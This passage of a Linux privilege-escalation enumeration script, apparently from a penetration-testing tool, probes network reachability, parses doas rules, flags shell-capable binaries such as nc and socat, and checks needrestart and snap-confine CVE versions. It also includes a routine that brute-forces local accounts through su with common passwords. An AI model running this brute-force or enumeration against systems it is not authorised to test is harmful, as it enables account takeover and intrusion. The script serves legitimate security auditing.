   3586   (bash -c '(echo >/dev/tcp/104.18.74.230/80 2>/dev/null && echo "Port 80 is accessible" && exit 0) 2>/dev/null || echo "Port 80 is not accessible"') & local_pid=$!
   3587   sleep $TIMEOUT_INTERNET_SECONDS_80 && kill -9 $local_pid 2>/dev/null && echo "Port 80 is not accessible"
   3588 }
   3589 
   3590 su_try_pwd(){
   3591   BFUSER=$1
   3592   PASSWORDTRY=$2
   3593   trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null)
   3594     if [ $? -eq 0 ]; then
   3595     echo "  You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   3596   fi
   3597 }
   3598 
   3599 check_tcp_443_bin () {
   3600   local TIMEOUT_INTERNET_SECONDS_443_BIN=$1
   3601   local url_443="https://1.1.1.1"
   3602   if command -v curl >/dev/null 2>&1; then
   3603     if curl -s -k --connect-timeout "$TIMEOUT_INTERNET_SECONDS_443_BIN" "$url_443" >/dev/null 2>&1
   3604     then
   3605       echo "Port 443 is accessible with curl"
   3606       return 0                      # ✅ success
   3607     else
   3608       echo "Port 443 is not accessible with curl"
   3609       return 1
   3610     fi
   3611   elif command -v wget >/dev/null 2>&1; then
   3612     if wget -q --no-check-certificate --timeout="$TIMEOUT_INTERNET_SECONDS_443_BIN" -O - "$url_443" >/dev/null 2>&1
   3613     then
   3614       echo "Port 443 is accessible with wget"
   3615       return 0
   3616     else
   3617       echo "Port 443 is not accessible with wget"
   3618       return 1
   3619     fi
   3620   else
   3621     echo "Neither curl nor wget available"
   3622     return 1
   3623   fi
   3624 }
   3625 
   3626 check_icmp(){
   3627   local TIMEOUT_INTERNET_SECONDS_ICMP=$1
   3628   if ! [ "$(command -v ping 2>/dev/null || echo -n '')" ]; then
   3629     echo "  ping not found"
   3630     return
   3631   fi
   3632   # example.com
   3633   ((ping -c 1 1.1.1.1 2>/dev/null | grep -Ei "1 received|1 packets received" && echo "ICMP is accessible" || echo "ICMP is not accessible" 2>/dev/null) | grep "accessible" && exit 0 ) 2>/dev/null || echo "ICMP is not accessible" & local_pid=$!
   3634   sleep $TIMEOUT_INTERNET_SECONDS_ICMP && kill -9 $local_pid 2>/dev/null && echo "ICMP is not accessible"
   3635 }
   3636 
   3637 check_tcp_443(){
   3638   local TIMEOUT_INTERNET_SECONDS_443=$1
   3639   if ! [ -f "/bin/bash" ]; then
   3640     echo "  /bin/bash not found"
   3641     return
   3642   fi
   3643   # example.com
   3644   (bash -c '(echo >/dev/tcp/104.18.74.230/443 2>/dev/null && echo "Port 443 is accessible" && exit 0) 2>/dev/null || echo "Port 443 is not accessible"') & local_pid=$!
   3645   sleep $TIMEOUT_INTERNET_SECONDS_443 && kill -9 $local_pid 2>/dev/null && echo "Port 443 is not accessible"
   3646 }
   3647 
   3648 check_if_su_brute(){
   3649   EXISTS_SU="$(command -v su 2>/dev/null || echo -n '')"
   3650   error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1);
   3651   if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then
   3652     echo "1"
   3653   fi
   3654 }
   3655 
   3656 su_brute_user_num(){
   3657   BFUSER=$1
   3658   TRIES=$2
   3659   su_try_pwd "$BFUSER" "" &    #Try without password
   3660   su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password
   3661   su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password
   3662   if [ "$PASSWORD" ]; then
   3663     su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password
   3664   fi
   3665   for i in $(seq "$TRIES"); do
   3666     su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000)
   3667     sleep 0.007 # To not overload the system
   3668   done
   3669   wait
   3670 }
   3671 
   3672 get_current_user_privot_pid(){
   3673     CURRENT_USER_PIVOT_PID=""
   3674     if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
   3675         # Function to get user by PID
   3676         get_user_by_pid() {
   3677             ps -p "$1" -o user | grep -v "USER"
   3678         }
   3679         # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
   3680         ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
   3681             if [ "$ppid" = "0" ]; then
   3682             continue
   3683             fi
   3684             ppid_user=$(get_user_by_pid "$ppid")
   3685             if echo "$user" | grep -Eqv "$ppid_user|root$"; then
   3686             if [ "$ppid_user" = "$USER" ]; then
   3687                 CURRENT_USER_PIVOT_PID="$ppid"
   3688             fi
   3689             fi
   3690         done
   3691         echo ""
   3692     fi
   3693 }
   3694 
   3695 doas_extract_upstream_version() {
   3696   printf "%s\n" "$1" | grep -oE '[0-9]+(\.[0-9]+){1,2}' | head -n 1
   3697 }
   3698 doas_version_ge() {
   3699   awk -v left="$1" -v right="$2" 'BEGIN {
   3700     left_n = split(left, left_v, ".")
   3701     right_n = split(right, right_v, ".")
   3702     max_n = left_n > right_n ? left_n : right_n
   3703     for (i = 1; i <= max_n; i++) {
   3704       left_i = (i <= left_n ? left_v[i] : 0) + 0
   3705       right_i = (i <= right_n ? right_v[i] : 0) + 0
   3706       if (left_i > right_i) exit 0
   3707       if (left_i < right_i) exit 1
   3708     }
   3709     exit 0
   3710   }'
   3711 }
   3712 doas_version_lt() {
   3713   if doas_version_ge "$1" "$2"; then
   3714     return 1
   3715   fi
   3716   return 0
   3717 }
   3718 doas_version_le() {
   3719   if doas_version_lt "$2" "$1"; then
   3720     return 1
   3721   fi
   3722   return 0
   3723 }
   3724 doas_read_rules() {
   3725   awk '
   3726     function trim(value) {
   3727       sub(/^[[:space:]]+/, "", value)
   3728       sub(/[[:space:]]+$/, "", value)
   3729       return value
   3730     }
   3731     {
   3732       source = $0
   3733       output = ""
   3734       quoted = 0
   3735       escaped = 0
   3736       for (i = 1; i <= length(source); i++) {
   3737         char = substr(source, i, 1)
   3738         if (char == "#" && !quoted) break
   3739         output = output char
   3740         if (char == "\"" && !escaped) quoted = !quoted
   3741         if (char == "\\" && !escaped) escaped = 1
   3742         else escaped = 0
   3743       }
   3744       output = trim(output)
   3745       if (output ~ /^(permit|deny)([[:space:]]|$)/)
   3746         printf "%d\t%s\n", NR, output
   3747     }
   3748   ' "$1" 2>/dev/null
   3749 }
   3750 doas_rule_identity() {
   3751   printf "%s\n" "$1" | awk '
   3752     {
   3753       in_setenv = 0
   3754       for (i = 2; i <= NF; i++) {
   3755         token = $i
   3756         if (in_setenv) {
   3757           if (token ~ /}/) in_setenv = 0
   3758           continue
   3759         }
   3760         if (token == "setenv") {
   3761           in_setenv = 1
   3762           continue
   3763         }
   3764         if (token == "nopass" || token == "nolog" || token == "persist" || token == "keepenv")
   3765           continue
   3766         gsub(/^"|"$/, "", token)
   3767         print token
   3768         exit
   3769       }
   3770     }
   3771   '
   3772 }
   3773 doas_rule_has_option() {
   3774   printf "%s\n" "$1" | awk -v wanted="$2" '
   3775     {
   3776       in_setenv = 0
   3777       for (i = 2; i <= NF; i++) {
   3778         token = $i
   3779         if (in_setenv) {
   3780           if (token ~ /}/) in_setenv = 0
   3781           continue
   3782         }
   3783         if (token == "setenv") {
   3784           if (wanted == token) exit 0
   3785           in_setenv = 1
   3786           continue
   3787         }
   3788         if (token == "nopass" || token == "nolog" || token == "persist" || token == "keepenv") {
   3789           if (wanted == token) exit 0
   3790           continue
   3791         }
   3792         exit 1
   3793       }
   3794       exit 1
   3795     }
   3796   '
   3797 }
   3798 doas_rule_has_dangerous_environment() {
   3799   if doas_rule_has_option "$1" keepenv; then
   3800     return 0
   3801   fi
   3802   printf "%s\n" "$1" | grep -Eq '(^|[[:space:]{])(setenv[[:space:]]*\{[^}]*[[:space:]])?(PATH|LD_PRELOAD|LD_LIBRARY_PATH|BASH_ENV|ENV|PYTHONPATH|PERL5LIB|RUBYLIB)([=[:space:]}]|$)'
   3803 }
   3804 doas_rule_command() {
   3805   printf "%s\n" "$1" | awk '
   3806     {
   3807       for (i = 1; i < NF; i++) {
   3808         if ($i == "cmd") {
   3809           command = $(i + 1)
   3810           gsub(/^"|"$/, "", command)
   3811           print command
   3812           exit
   3813         }
   3814       }
   3815     }
   3816   '
   3817 }
   3818 doas_rule_targets_root() {
   3819   printf "%s\n" "$1" | awk '
   3820     {
   3821       for (i = 1; i < NF; i++) {
   3822         if ($i == "as") {
   3823           target = $(i + 1)
   3824           gsub(/^"|"$/, "", target)
   3825           exit(target == "root" || target == "0" || target == "#0" ? 0 : 1)
   3826         }
   3827       }
   3828       exit 0
   3829     }
   3830   '
   3831 }
   3832 doas_rule_applies_to_current_user() {
   3833   doas_rule_identity_value="$(doas_rule_identity "$1")"
   3834   case "$doas_rule_identity_value" in
   3835     "$doas_current_user"|"$doas_current_uid"|"#$doas_current_uid") return 0 ;;
   3836   esac
   3837   case "$doas_rule_identity_value" in
   3838     :*)
   3839       doas_rule_identity_value="${doas_rule_identity_value#:}"
   3840       for doas_candidate in $doas_current_groups $doas_current_gids; do
   3841         if [ "$doas_candidate" = "$doas_rule_identity_value" ] || [ "#$doas_candidate" = "$doas_rule_identity_value" ]; then
   3842           return 0
   3843         fi
   3844       done
   3845       ;;
   3846   esac
   3847   return 1
   3848 }
   3849 doas_command_is_dangerous() {
   3850   doas_rule_cmd="$1"
   3851   doas_rule_cmd="${doas_rule_cmd##*/}"
   3852   case "$doas_rule_cmd" in
   3853     ash|awk|bash|busybox|csh|dash|dstat|ed|env|expect|find|fish|gdb|git|ionice|jrunscript|ksh|less|lua|make|more|mv|nano|nawk|nc|ncat|nice|node|nvim|perl|php|python|python2|python3|rake|rlwrap|ruby|run-parts|rvim|sed|sh|socat|sqlite3|tar|tee|tclsh|vi|vim|watch|xargs|zsh)
   3854       return 0
   3855       ;;
   3856   esac
   3857   if [ -n "${sudoVB1:-}" ] && printf " %s\n" "$1" | grep -Eq "$sudoVB1" 2>/dev/null; then
   3858     return 0
   3859   fi
   3860   if [ -n "${sudoVB2:-}" ] && printf " %s\n" "$1" | grep -Eq "$sudoVB2" 2>/dev/null; then
   3861     return 0
   3862   fi
   3863   return 1
   3864 }
   3865 doas_get_package_details() {
   3866   doas_package_manager=""
   3867   doas_package_name=""
   3868   doas_package_full_version=""
   3869   doas_package_source=""
   3870   doas_package_homepage=""
   3871   doas_package_implementation="unknown"
   3872   if command -v dpkg-query >/dev/null 2>&1; then
   3873     doas_package_name="$(dpkg-query -S "$1" 2>/dev/null | head -n 1 | sed 's/: .*//' | cut -d: -f1)"
   3874     if [ -n "$doas_package_name" ]; then
   3875       doas_package_manager="dpkg"
   3876       doas_package_full_version="$(dpkg-query -W -f='$''{Version}\n' "$doas_package_name" 2>/dev/null | head -n 1)"
   3877       doas_package_source="$(dpkg-query -W -f='$''{source:Package}\n' "$doas_package_name" 2>/dev/null | head -n 1 | sed 's/^src://')"
   3878       doas_package_homepage="$(dpkg-query -W -f='$''{Homepage}\n' "$doas_package_name" 2>/dev/null | head -n 1)"
   3879     fi
   3880   elif command -v rpm >/dev/null 2>&1; then
   3881     doas_package_line="$(rpm -qf --qf '%{NAME}|%{VERSION}-%{RELEASE}|%{URL}\n' "$1" 2>/dev/null | head -n 1)"
   3882     if [ -n "$doas_package_line" ]; then
   3883       doas_package_manager="rpm"
   3884       doas_package_name="$(printf "%s" "$doas_package_line" | cut -d'|' -f1)"
   3885       doas_package_full_version="$(printf "%s" "$doas_package_line" | cut -d'|' -f2)"
   3886       doas_package_homepage="$(printf "%s" "$doas_package_line" | cut -d'|' -f3-)"
   3887     fi
   3888   elif command -v apk >/dev/null 2>&1; then
   3889     for doas_candidate in opendoas doas; do
   3890       doas_candidate_version="$(apk info -e -v "$doas_candidate" 2>/dev/null | head -n 1)"
   3891       if [ -n "$doas_candidate_version" ]; then
   3892         doas_package_manager="apk"
   3893         doas_package_name="$doas_candidate"
   3894         doas_package_full_version="${doas_candidate_version#${doas_candidate}-}"
   3895         doas_package_homepage="$(apk info -a "$doas_candidate" 2>/dev/null | sed -n 's/^webpage[[:space:]]*:[[:space:]]*//p' | head -n 1)"
   3896         break
   3897       fi
   3898     done
   3899   elif command -v pacman >/dev/null 2>&1; then
   3900     doas_package_line="$(pacman -Qo "$1" 2>/dev/null | head -n 1)"
   3901     doas_package_name="$(printf "%s\n" "$doas_package_line" | sed -nE 's/.* is owned by ([^ ]+) .*/\1/p')"
   3902     doas_package_full_version="$(printf "%s\n" "$doas_package_line" | sed -nE 's/.* is owned by [^ ]+ ([^ ]+).*/\1/p')"
   3903     if [ -n "$doas_package_name" ]; then
   3904       doas_package_manager="pacman"
   3905       doas_package_homepage="$(pacman -Qi "$doas_package_name" 2>/dev/null | sed -n 's/^URL[[:space:]]*:[[:space:]]*//p' | head -n 1)"
   3906     fi
   3907   elif command -v pkg >/dev/null 2>&1; then
   3908     doas_package_name="$(pkg which -q "$1" 2>/dev/null | head -n 1)"
   3909     if [ -n "$doas_package_name" ]; then
   3910       doas_package_manager="pkg"
   3911       doas_package_line="$(pkg query '%n|%v|%o|%w' "$doas_package_name" 2>/dev/null | head -n 1)"
   3912       doas_package_name="$(printf "%s" "$doas_package_line" | cut -d'|' -f1)"
   3913       doas_package_full_version="$(printf "%s" "$doas_package_line" | cut -d'|' -f2)"
   3914       doas_package_source="$(printf "%s" "$doas_package_line" | cut -d'|' -f3)"
   3915       doas_package_homepage="$(printf "%s" "$doas_package_line" | cut -d'|' -f4-)"
   3916     fi
   3917   fi
   3918   doas_homepage_lower="$(printf "%s" "$doas_package_homepage" | tr '[:upper:]' '[:lower:]')"
   3919   case "$doas_homepage_lower:$doas_package_source:$doas_package_name" in
   3920     *duncaen/opendoas*|*:opendoas:*|*:*:opendoas) doas_package_implementation="opendoas" ;;
   3921     *slicer69/doas*) doas_package_implementation="slicer69" ;;
   3922   esac
   3923   if [ "$(uname -s 2>/dev/null)" = "OpenBSD" ]; then
   3924     doas_package_implementation="openbsd"
   3925   fi
   3926 }
   3927 doas_config_syntax_valid() {
   3928   if [ -n "${TIMEOUT:-}" ]; then
   3929     "$TIMEOUT" 5 "$1" -C "$2" >/dev/null 2>&1
   3930   else
   3931     "$1" -C "$2" >/dev/null 2>&1
   3932   fi
   3933 }
   3934 doas_check_command() {
   3935   if [ -n "${TIMEOUT:-}" ]; then
   3936     "$TIMEOUT" 5 "$1" -C "$2" "$3" 2>/dev/null
   3937   else
   3938     "$1" -C "$2" "$3" 2>/dev/null
   3939   fi
   3940 }
   3941 
   3942 nr48990_extract_upstream_version() {
   3943   printf '%s' "$1" | sed -E 's/^[0-9]+://; s/^[^0-9]*//; s/[^0-9.].*$//'
   3944 }
   3945 nr48990_version_lt() {
   3946   [ -n "$1" ] && [ -n "$2" ] || return 1
   3947   awk -v nr48990_a="$1" -v nr48990_b="$2" 'BEGIN {
   3948     nr48990_na = split(nr48990_a, nr48990_av, ".")
   3949     nr48990_nb = split(nr48990_b, nr48990_bv, ".")
   3950     nr48990_n = nr48990_na > nr48990_nb ? nr48990_na : nr48990_nb
   3951     for (nr48990_i = 1; nr48990_i <= nr48990_n; nr48990_i++) {
   3952       nr48990_ai = nr48990_av[nr48990_i] + 0
   3953       nr48990_bi = nr48990_bv[nr48990_i] + 0
   3954       if (nr48990_ai < nr48990_bi) exit 0
   3955       if (nr48990_ai > nr48990_bi) exit 1
   3956     }
   3957     exit 1
   3958   }'
   3959 }
   3960 nr48990_fixed_dpkg_version() {
   3961   # Vendor backports from Ubuntu CVE-2024-48990 and Debian DSA-5815-1 /
   3962   # DLA-3957-1; comparing only the upstream 3.8 version would misclassify them.
   3963   case "$1:$2" in
   3964     debian:bullseye|raspbian:bullseye) echo "3.5-4+deb11u4" ;;
   3965     debian:bookworm|raspbian:bookworm) echo "3.6-4+deb12u2" ;;
   3966     debian:trixie|debian:forky|debian:sid) echo "3.7-3.1" ;;
   3967     ubuntu:xenial) echo "2.6-1ubuntu0.1~esm1" ;;
   3968     ubuntu:bionic) echo "3.1-1ubuntu0.1+esm1" ;;
   3969     ubuntu:focal) echo "3.4-6ubuntu0.1+esm1" ;;
   3970     ubuntu:jammy) echo "3.5-5ubuntu2.2" ;;
   3971     ubuntu:noble) echo "3.6-7ubuntu4.3" ;;
   3972     ubuntu:oracular) echo "3.6-8ubuntu4.2" ;;
   3973     ubuntu:plucky) echo "3.6-8ubuntu6" ;;
   3974   esac
   3975 }
   3976 nr48990_effective_interpscan() {
   3977   nr48990_config="1"
   3978   for nr48990_config_file in "$1"etc/needrestart/needrestart.conf "$1"etc/needrestart/conf.d/*.conf; do
   3979     [ -r "$nr48990_config_file" ] || continue
   3980     nr48990_config_file_value="$(awk '
   3981       /^[[:space:]]*#/ { next }
   3982       {
   3983         nr48990_line = $0
   3984         sub(/[[:space:]]*#.*/, "", nr48990_line)
   3985         if (nr48990_line ~ /^[[:space:]]*[$]nrconf[[:space:]]*\{[[:space:]]*[\047\042]?interpscan[\047\042]?[[:space:]]*\}[[:space:]]*=[[:space:]]*[01][[:space:]]*;/) {
   3986           sub(/^.*=[[:space:]]*/, "", nr48990_line)
   3987           sub(/[[:space:]]*;.*/, "", nr48990_line)
   3988           print nr48990_line
   3989         }
   3990       }
   3991     ' "$nr48990_config_file" 2>/dev/null | tail -n1)"
   3992     [ -n "$nr48990_config_file_value" ] && nr48990_config="$nr48990_config_file_value"
   3993   done
   3994   printf '%s' "$nr48990_config"
   3995 }
   3996 checkNeedrestartCVE202448990() {
   3997   nr48990_root="${ROOT_FOLDER:-/}"
   3998   case "$nr48990_root" in
   3999     */) ;;
   4000     *) nr48990_root="${nr48990_root}/" ;;
   4001   esac
   4002   nr48990_binary=""
   4003   if [ "$nr48990_root" = "/" ]; then
   4004     nr48990_binary="$(command -v needrestart 2>/dev/null)"
   4005   else
   4006     for nr48990_binary_candidate in usr/sbin/needrestart usr/bin/needrestart sbin/needrestart bin/needrestart; do
   4007       if [ -f "${nr48990_root}${nr48990_binary_candidate}" ]; then
   4008         nr48990_binary="${nr48990_root}${nr48990_binary_candidate}"
   4009         break
   4010       fi
   4011     done
   4012   fi
   4013   nr48990_full_version=""
   4014   nr48990_manager=""
   4015   if command -v dpkg-query >/dev/null 2>&1; then
   4016     nr48990_dpkg_record="$(dpkg-query --admindir="${nr48990_root}var/lib/dpkg" -W -f='$''{Status}|$''{Version}\n' needrestart 2>/dev/null | head -n1)"
   4017     case "$nr48990_dpkg_record" in
   4018       "install ok installed|"*)
   4019         nr48990_full_version="${nr48990_dpkg_record#*|}"
   4020         [ -n "$nr48990_full_version" ] && nr48990_manager="dpkg"
   4021         ;;
   4022     esac
   4023   fi
   4024   if [ -z "$nr48990_full_version" ] && command -v rpm >/dev/null 2>&1; then
   4025     if nr48990_rpm_record="$(rpm --root "$nr48990_root" -q --qf '%{VERSION}-%{RELEASE}\n' needrestart 2>/dev/null)"; then
   4026       nr48990_full_version="$(printf '%s\n' "$nr48990_rpm_record" | head -n1)"
   4027       [ -n "$nr48990_full_version" ] && nr48990_manager="rpm"
   4028     fi
   4029   fi
   4030   [ -n "$nr48990_binary" ] || [ -n "$nr48990_full_version" ] || return 0
   4031   print_3title "Needrestart interpreter-scanner LPE (CVE-2024-48990)" "T1068"
   4032   print_info "https://ubuntu.com/security/CVE-2024-48990"
   4033   nr48990_os_release="${nr48990_root}etc/os-release"
   4034   nr48990_distro_id="$(sed -nE 's/^ID="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)"
   4035   nr48990_codename="$(sed -nE 's/^VERSION_CODENAME="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)"
   4036   nr48990_ubuntu_codename="$(sed -nE 's/^UBUNTU_CODENAME="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)"
   4037   if [ -n "$nr48990_ubuntu_codename" ]; then
   4038     nr48990_distro_id="ubuntu"
   4039     nr48990_codename="$nr48990_ubuntu_codename"
   4040   fi
   4041   nr48990_upstream_version="$(nr48990_extract_upstream_version "$nr48990_full_version")"
   4042   nr48990_interpscan="$(nr48990_effective_interpscan "$nr48990_root")"
   4043   nr48990_dpkg_fixed=""
   4044   nr48990_status="unknown"
   4045   if [ "$nr48990_manager" = "dpkg" ] && command -v dpkg >/dev/null 2>&1; then
   4046     nr48990_dpkg_fixed="$(nr48990_fixed_dpkg_version "$nr48990_distro_id" "$nr48990_codename")"
   4047     if [ -n "$nr48990_dpkg_fixed" ]; then
   4048       if dpkg --compare-versions "$nr48990_full_version" lt "$nr48990_dpkg_fixed"; then
   4049         nr48990_status="affected"
   4050       else
   4051         nr48990_status="fixed"
   4052       fi
   4053     fi
   4054   fi
   4055   if [ "$nr48990_status" = "unknown" ] && [ -n "$nr48990_upstream_version" ]; then
   4056     if nr48990_version_lt "$nr48990_upstream_version" "3.8"; then
   4057       nr48990_status="potential"
   4058     else
   4059       nr48990_status="fixed"
   4060     fi
   4061   fi
   4062   echo "needrestart package: ${nr48990_full_version:-version unknown}${nr48990_manager:+ ($nr48990_manager)}" | sed -${E} "s,.*,${SED_LIGHT_CYAN},"
   4063   if [ -n "$nr48990_dpkg_fixed" ]; then
   4064     echo "Vendor fixed version for ${nr48990_distro_id:-unknown} ${nr48990_codename:-unknown}: $nr48990_dpkg_fixed"
   4065   fi
   4066   case "$nr48990_status:$nr48990_interpscan" in
   4067     affected:0|potential:0)
   4068       echo "Affected needrestart version detected, but the official interpscan=0 mitigation is active; update is still recommended" | sed -${E} "s,.*,${SED_YELLOW},"
   4069       ;;
   4070     affected:*)
   4071       echo "VULNERABLE to CVE-2024-48990: needrestart $nr48990_full_version is below the vendor fixed version and interpreter scanning is enabled" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4072       ;;
   4073     potential:*)
   4074       echo "Potentially vulnerable to CVE-2024-48990: upstream needrestart $nr48990_upstream_version is before 3.8 and interpreter scanning is enabled; verify distro backports" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4075       ;;
   4076     fixed:*)
   4077       echo "needrestart $nr48990_full_version is not vulnerable to CVE-2024-48990 according to the known vendor/upstream fixed version" | sed -${E} "s,.*,${SED_GREEN},"
   4078       ;;
   4079     unknown:0)
   4080       echo "needrestart is present; version is unknown, but the interpscan=0 mitigation is active" | sed -${E} "s,.*,${SED_YELLOW},"
   4081       ;;
   4082     *)
   4083       echo "needrestart is present with interpreter scanning enabled, but its version could not be assessed" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4084       ;;
   4085   esac
   4086   echo "Effective interpreter scanning: $nr48990_interpscan (0=disabled mitigation, 1=enabled/default)"
   4087   echo ""
   4088 }
   4089 
   4090 warn_exec(){
   4091   $* 2>/dev/null || echo_not_found $1
   4092 }
   4093 
   4094 sc8933_extract_upstream_version() {
   4095   printf '%s' "$1" | sed -E 's/^[0-9]+://; s/^[^0-9]*//; s/[^0-9.].*$//'
   4096 }
   4097 sc8933_version_ge() {
   4098   [ -n "$1" ] && [ -n "$2" ] || return 1
   4099   if command -v dpkg >/dev/null 2>&1; then
   4100     dpkg --compare-versions "$1" ge "$2"
   4101   else
   4102     [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V 2>/dev/null | tail -n1)" = "$1" ]
   4103   fi
   4104 }
   4105 sc8933_version_lt() {
   4106   [ -n "$1" ] && [ -n "$2" ] || return 1
   4107   if command -v dpkg >/dev/null 2>&1; then
   4108     dpkg --compare-versions "$1" lt "$2"
   4109   else
   4110     [ "$1" != "$2" ] && [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V 2>/dev/null | head -n1)" = "$1" ]
   4111   fi
   4112 }
   4113 sc8933_version_is_vulnerable() {
   4114   sc8933_version="$1"
   4115   sc8933_kind="$2"
   4116   sc8933_os_release="$3"
   4117   sc8933_upstream="$(sc8933_extract_upstream_version "$sc8933_version")"
   4118   # The upstream affected range is >= 2.75.0 and < 2.76.1. Ubuntu fixed
   4119   # 2.76 with release-specific backports, so compare the complete dpkg version.
   4120   sc8933_version_ge "$sc8933_upstream" "2.75" || return 1
   4121   if [ "$sc8933_kind" = "deb" ]; then
   4122     sc8933_fixed=""
   4123     case "$sc8933_os_release" in
   4124       22.04) sc8933_fixed="2.76+ubuntu22.04.1" ;;
   4125       24.04) sc8933_fixed="2.76+ubuntu24.04.1" ;;
   4126       26.04) sc8933_fixed="2.76+ubuntu26.04.3" ;;
   4127     esac
   4128     if [ -n "$sc8933_fixed" ]; then
   4129       sc8933_version_lt "$sc8933_version" "$sc8933_fixed"
   4130       return
   4131     fi
   4132   fi
   4133   sc8933_version_lt "$sc8933_upstream" "2.76.1"
   4134 }
   4135 checkSnapConfineCVE20268933() {
   4136   command -v getcap >/dev/null 2>&1 || return
   4137   sc8933_root="${ROOT_FOLDER:-/}"
   4138   case "$sc8933_root" in
   4139     */) ;;
   4140     *) sc8933_root="${sc8933_root}/" ;;
   4141   esac
   4142   sc8933_os_id="$(sed -nE 's/^ID="?([^" ]+)"?$/\1/p' "${sc8933_root}etc/os-release" 2>/dev/null | head -n1)"
   4143   sc8933_os_release="$(sed -nE 's/^VERSION_ID="?([^" ]+)"?$/\1/p' "${sc8933_root}etc/os-release" 2>/dev/null | head -n1)"
   4144   sc8933_reported=""
   4145   for sc8933_path in \
   4146     "${sc8933_root}usr/lib/snapd/snap-confine" \
   4147     "${sc8933_root}snap/snapd/current/usr/lib/snapd/snap-confine"; do
   4148     [ -f "$sc8933_path" ] || continue
   4149     [ -u "$sc8933_path" ] && continue
   4150     sc8933_caps="$(getcap "$sc8933_path" 2>/dev/null)"
   4151     printf '%s' "$sc8933_caps" | grep -q 'cap_sys_admin' || continue
   4152     if [ -z "$sc8933_reported" ]; then
   4153       print_3title "Set-capabilities snap-confine (CVE-2026-8933)" "T1068"
   4154       print_info "https://ubuntu.com/security/CVE-2026-8933"
   4155       sc8933_reported="1"
   4156     fi
   4157     sc8933_kind="snap"
   4158     sc8933_yaml="${sc8933_root}snap/snapd/current/meta/snap.yaml"
   4159     sc8933_version=""
   4160     case "$sc8933_path" in
   4161       */usr/lib/snapd/snap-confine)
   4162         if [ "$sc8933_path" = "${sc8933_root}usr/lib/snapd/snap-confine" ]; then
   4163           sc8933_kind="deb"
   4164           if command -v dpkg-query >/dev/null 2>&1; then
   4165             sc8933_version="$(dpkg-query --admindir="${sc8933_root}var/lib/dpkg" -W -f='$''{Version}\n' snapd 2>/dev/null | head -n1)"
   4166           fi
   4167         elif [ -r "$sc8933_yaml" ]; then
   4168           sc8933_version="$(sed -nE "s/^version:[[:space:]]*['\"]?([^'\"[:space:]]+).*/\1/p" "$sc8933_yaml" 2>/dev/null | head -n1)"
   4169         fi
   4170         ;;
   4171     esac
   4172     echo "$sc8933_caps" | sed -${E} "s,.*,${SED_LIGHT_CYAN},"
   4173     if [ -z "$sc8933_version" ]; then
   4174       echo "Potential CVE-2026-8933 exposure: privileged snap-confine uses file capabilities; version could not be determined" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4175     elif [ "$sc8933_os_id" != "ubuntu" ] && [ "$sc8933_kind" = "deb" ]; then
   4176       if sc8933_version_is_vulnerable "$sc8933_version" "$sc8933_kind" "$sc8933_os_release"; then
   4177         echo "snap-confine version $sc8933_version uses file capabilities and is in the upstream CVE-2026-8933 range; verify distro backports" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4178       else
   4179         echo "snap-confine version $sc8933_version is not in the known CVE-2026-8933 vulnerable range" | sed -${E} "s,.*,${SED_GREEN},"
   4180       fi
   4181     elif sc8933_version_is_vulnerable "$sc8933_version" "$sc8933_kind" "$sc8933_os_release"; then
   4182       echo "Vulnerable to CVE-2026-8933: set-capabilities snap-confine version $sc8933_version permits local privilege escalation to root" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   4183     else
   4184       echo "snap-confine version $sc8933_version is not in the known CVE-2026-8933 vulnerable range" | sed -${E} "s,.*,${SED_GREEN},"
   4185     fi
   4186   done
   4187   if [ -n "$sc8933_reported" ]; then
   4188     echo ""
   4189   fi
   4190 }
   4191 
   4192 check_critial_root_path(){
   4193   folder_path="$1"
   4194   if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
   4195   if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
   4196   if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi
   4197 }
   4198 
   4199 macosNotSigned(){
   4200   for f in $1/*; do
   4201     if codesign -vv -d \"$f\" 2>&1 | grep -q 'not signed'; then
   4202       echo "$f isn't signed" | sed -${E} "s,.*,${SED_RED},"
   4203     fi
   4204   done
   4205 }
   4206 
   4207 search_for_regex(){
   4208     title=$1
   4209     regex=$2
   4210     caseSensitive=$3
   4211     if [ "$caseSensitive" ]; then
   4212         i="i"
   4213     else
   4214         i=""
   4215     fi
   4216     print_3title_no_nl "Searching $title..."
   4217     if [ "$SEARCH_IN_FOLDER" ]; then
   4218         timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
   4219     else
   4220         # Search in home direcoties (usually the slowest)
